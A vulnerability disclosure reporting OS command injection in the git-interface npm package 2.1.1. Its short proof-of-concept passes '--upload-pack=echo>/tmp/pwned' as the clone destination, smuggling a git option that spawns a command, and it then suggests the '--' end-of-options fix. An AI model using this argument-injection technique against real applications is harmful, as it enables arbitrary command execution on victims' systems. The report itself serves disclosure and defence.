Command Injection vulnerability in git-interface@2.1.1 in yarkeev/git-interface
Reported on
Apr 16th 2022
git-interface describes itself as "an Interface to work with a git repository in node.js".
Resources:
- Project's GitHub source code: https://github.com/yarkeev/git-interface
- Project's npm package: https://www.npmjs.com/package/git-interface
I'm reporting an OS Command Injection vulnerability in the git-interface npm package. The API may be abused if user input can name a valid directory on disk and also supply the destination directory that a repository is cloned to.
Proof of Concept exploit
Install git-interface@2.1.1, which is the latest.
Run the following code with one precondition: the /tmp/new directory needs to exist (it doesn't need to be a git-initialized directory), so you could equally provide a predictable path such as /usr/src:
const { Git } = require('git-interface');
const git = new Git({
  dir: '/tmp/new' // default path is the current directory
});
// The destination string is passed straight to git, which parses it as an option rather than a path:
git.clone('file:///tmp/new', '--upload-pack=echo>/tmp/pwned');
Observe a new file created: /tmp/pwned
Mitigation suggestions
Use the shell's -- (end of options) notation after whichever command-line arguments the library itself supports (if any), so that input passed through to the git command is treated as positional arguments rather than as command-line options. For example: git clone -- <path> <destination>
would prevent path and destination from being interpreted as command-line options by the git command.
Author
Liran Tal
Impact
If both the source path and the destination are provided by user input, then git clone also accepts the --upload-pack command-line argument, which allows the attacker to have git spawn an arbitrary operating system command.
References
SECURITY.md